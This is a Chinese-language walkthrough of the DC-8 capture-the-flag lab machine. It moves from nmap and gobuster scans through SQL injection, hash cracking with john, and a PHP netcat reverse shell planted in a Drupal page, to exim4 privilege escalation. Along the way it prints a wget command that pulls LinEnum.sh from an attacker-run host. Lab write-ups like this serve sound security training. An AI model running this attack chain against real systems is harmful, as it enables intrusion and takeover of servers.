靶机闯关 DC-8

靶机下载：

http://www.five86.com/dc-8.html

环境搭建： 导入虚拟机设置NAT。靶机DHCP已启用

开始渗透：

使用netdiscover二层扫描工具获取靶机IP为192.168.111.137后

使用nmap对靶机网络服务端口进行探测

nmap -A -p- 192.168.111.137

扫描发现开放了22和80端口，分别对应的服务是ssh和http,值得注意的是还发现了robots.txt,访问之

发现里面是Drupal 的一些安装文件，而且或获知的Drupal的版本

先目录扫描一波看看有没有一些敏感目录，发现user是一个管理登陆页面

gobuster dir -u http://192.168.111.137 -w /usr/share/wordlists/dirb/big.txt

访问80端口，测试了一些页面发现侧边选项栏的URL可能存在SQL注入

测试一些顺利爆出数据库，可惜的是权限不够高

接下来进一步获取，最后爆出两个管理员账号和密码，但是不是MD5加密，百度了一下应该是哈希加密

把两个hash密码保存到两个文件，使用john爆破

此时已经知道了登陆页面，使用管理账号密码登陆进去，发现有页面编辑

本来想着使用中国蚁剑连接shell的，但是连接下使用有点不顺畅，就使用netcat反弹一个shell

php代码修改到了Contact Us页面上，而且测试了一些要运行PHP代码是提交数据才行

使用python获取一个完全交互的shell，并且在本地传输一个linux辅助提权脚本

目标shell:python -c "import pty;pty.spawn('/bin/bash')"
wget http://192.168.111.128:8888/LinEnum.sh

kali：python -m SimpleHTTPServer 8888

赋予权限后执行，发现exim4在使用时具有root权限，那这可能是一个突破口

（SUID可以让调用者以文件拥有者的身份运行该文件，所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件，那么我们运行该文件的时候就得获得root用户的身份了。）

查阅版本，并且在kali上搜索关于版本的漏洞

searchsploit exim

现在看下脚本的利用方式，里面介绍了有两个使用方式，并且使用vim把shell的文件格式修改成unix

(如果脚本文件的格式不是unix的话，在linux上执行会报错，具体查阅https://blog.csdn.net/chenzhou123520/article/details/84410305)

修改之后把脚本文件下载到目标机器，给与执行权限使用第一种方式参数 setuid进行提权

但是提权失败了，这个时候使用第二种参数提权

可以看到已经获取到权限了，一般最后的flag都是在root里面，进入到root即可获取flag

最后收一下尾